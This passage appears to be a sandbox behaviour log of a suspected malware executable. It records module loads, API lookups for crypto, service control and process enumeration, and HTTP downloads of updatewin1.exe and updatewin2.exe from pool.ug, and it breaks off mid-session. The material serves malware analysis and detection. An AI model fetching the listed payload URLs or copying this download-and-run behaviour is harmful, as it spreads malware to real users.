Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Module (292)
Operation | Module | Additional Information | Success | Count
Load | kernel32.dll | base_address = 0x76c20000 | True | 3
Load | WINMM.dll | base_address = 0x74af0000 | True | 1
Load | SHLWAPI.dll | base_address = 0x75340000 | True | 1
Load | KERNEL32.dll | base_address = 0x76c20000 | True | 1
Load | USER32.dll | base_address = 0x74f40000 | True | 1
Load | ADVAPI32.dll | base_address = 0x74d40000 | True | 1
Load | SHELL32.dll | base_address = 0x75fd0000 | True | 1
Load | ole32.dll | base_address = 0x755e0000 | True | 1
Load | OLEAUT32.dll | base_address = 0x75220000 | True | 1
Load | IPHLPAPI.DLL | base_address = 0x74b50000 | True | 1
Load | WS2_32.dll | base_address = 0x75bc0000 | True | 1
Load | DNSAPI.dll | base_address = 0x74a80000 | True | 1
Load | CRYPT32.dll | base_address = 0x759b0000 | True | 1
Load | msvcr100.dll | base_address = 0x749c0000 | True | 1
Load | Psapi.dll | base_address = 0x75140000 | True | 1
Load | Shell32.dll | base_address = 0x75fd0000 | True | 1
Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 | True | 12
Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 260 | True | 2
Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 1024 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76c34f2b | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76c31252 | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76c34208 | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x76c3359f | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77170fcb | True | 9
Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77169d35 | True | 4
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x76c5735f | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = Module32FirstW, address_out = 0x76c579f9 | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x753eab49 | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenUrlW, address_out = 0x7544be5c | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x753eb406 | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenUrlA, address_out = 0x754130f1 | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoW, address_out = 0x753f5c75 | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenA, address_out = 0x753ff18e | True | 1
Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x753f9197 | True | 1
Get Address | c:\windows\syswow64\winmm.dll | function = timeGetTime, address_out = 0x74af26e0 | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindExtensionW, address_out = 0x7535a1b9 | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x7535bb71 | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathRemoveFileSpecW, address_out = 0x75353248 | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFileExistsW, address_out = 0x753545bf | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathAppendW, address_out = 0x753581ef | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathAppendA, address_out = 0x7534d65e | True | 1
Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFileExistsA, address_out = 0x7537ad1a | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x76c3110c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x76c33587 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x76c35223 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x76c353c6 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x76c34435 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x76c317d1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x76c35a4b | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x76c31b00 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x76c334c8 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x76c3103d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x76c4c807 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateDirectoryW, address_out = 0x76c34259 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x76c31136 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalDrives, address_out = 0x76c35371 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x76c3186e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x76c31282 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeA, address_out = 0x76c4ef75 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x76c31986 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x76c3588e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x76c35063 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76c3170d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x76c3492b | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x76c310ff | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x76c5830d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x76c34620 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpynW, address_out = 0x76c5d556 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessA, address_out = 0x76c31072 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x76c4d802 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x76c33ed3 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x76c33f5c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatA, address_out = 0x76c52b7a | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x76c333a0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76c35929 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76c3192e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76c31700 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x76c3469b | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameA, address_out = 0x76c5594d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSizeEx, address_out = 0x76c359e2 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x76c311c0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x76c311a9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x76c31222 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x76c31856 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileW, address_out = 0x76c49af0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x76c34442 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x76c58baf | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x76c3168c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x76c3183e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x76c314b1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x76c5896c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x76c5828e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexA, address_out = 0x76c34c6b | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FatalAppExitA, address_out = 0x76cb4691 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x76c31410 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x76c389b3 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x76c32d3c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76c53102 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileA, address_out = 0x76c35444 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x76c52a9d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x76c4cf28 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x76c334b0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x76c3dd0e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x76c4174d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x76c34950 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x76c35558 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x76c34467 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateDirectoryA, address_out = 0x76c5d526 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x76c334d5 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x76c314fb | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x76c311e0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x76c349ad | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76c5772f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x76c351cb | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x76c351e3 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76c311f8 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76c31725 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x76c34d40 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x771645f5 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeZoneInformation, address_out = 0x76c3465a | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x76c358a6 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x76c31946 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77163002 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x76c3495d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7715e026 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoW, address_out = 0x76c33c42 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocale, address_out = 0x76c4ce46 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLCID, address_out = 0x76c33da5 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesW, address_out = 0x76cb425f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatW, address_out = 0x76c534d7 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatW, address_out = 0x76c4f481 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringW, address_out = 0x76c33bca | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x76c317b9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x76cd7bff | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x76c31328 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77171f6e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x76cb454f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x76c4ce2e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x76c351b3 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x76c33531 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x76c34a6f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x76c57aca | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x76cd739a | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x76c5d1d4 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleCtrlHandler, address_out = 0x76c38a09 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x76c5d1c3 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77152270 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x771522b0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = AreFileApisANSI, address_out = 0x76cb40d1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x76c37a10 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x76c314e9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76c31450 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x76c317ec | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x76c35189 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x76c314c9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x76c3e331 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76c33509 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76c31809 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreW, address_out = 0x76c4ca5a | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x76c5d1a1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x76c3179c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x76c34493 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76c35235 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x76c354ee | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74f588f7 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x74f57809 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExW, address_out = 0x74f5b17d | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x74f60dfb | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = IsWindow, address_out = 0x74f57136 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExW, address_out = 0x74f58a29 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x74f63559 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcW, address_out = 0x771625dd | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = PeekMessageW, address_out = 0x74f605ba | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = PostThreadMessageW, address_out = 0x74f58bff | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxW, address_out = 0x74fafd3f | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageW, address_out = 0x74f5787b | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = PostQuitMessage, address_out = 0x74f59abb | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = DestroyWindow, address_out = 0x74f59a55 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74f59679 | True | 1
Get Address | c:\windows\syswow64\user32.dll | function = GetMessageW, address_out = 0x74f578e2 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGetHashParam, address_out = 0x74d4df7e | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextW, address_out = 0x74d4df14 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = OpenSCManagerW, address_out = 0x74d4ca64 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = OpenServiceW, address_out = 0x74d4ca4c | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptReleaseContext, address_out = 0x74d4e124 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x74d5157a | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptHashData, address_out = 0x74d4df36 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74d514d6 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74d5469d | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyHash, address_out = 0x74d4df66 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = ControlService, address_out = 0x74d67144 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74d5468d | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptCreateHash, address_out = 0x74d4df4e | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptEncrypt, address_out = 0x74d6779b | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CryptImportKey, address_out = 0x74d4c532 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = QueryServiceStatus, address_out = 0x74d52a86 | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74d546ad | True | 1
Get Address | c:\windows\syswow64\advapi32.dll | function = CloseServiceHandle, address_out = 0x74d5369c | True | 1
Get Address | c:\windows\syswow64\shell32.dll | function = SHGetPathFromIDListW, address_out = 0x760617bf | True | 1
Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderLocation, address_out = 0x7605e141 | True | 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
Service (2)
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
System (107)
Operation Additional Information Success Count Logfile
Sleep duration = 100 milliseconds (0.100 seconds) True 101
Fn
Get Time type = System Time, time = 2019-05-13 17:22:52 (UTC) True 1
Fn
Get Time type = Ticks, time = 152132 True 1
Fn
Get Time type = Performance Ctr, time = 21302211652 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:22:54 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 21545969016 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:22:56 (UTC) True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (10)
Information Value
Total Data Sent 5.49 KB
Total Data Received 5.98 MB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 46.232.113.12
HTTP Session #1
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin1.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://pool.ug/tesptc/penelop/updatewin1.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 2560 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
Information Value
User Agent Microsoft Internet Explorer
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 590 bytes
Data Received 0.99 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = pool.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin2.exe True 1
Fn
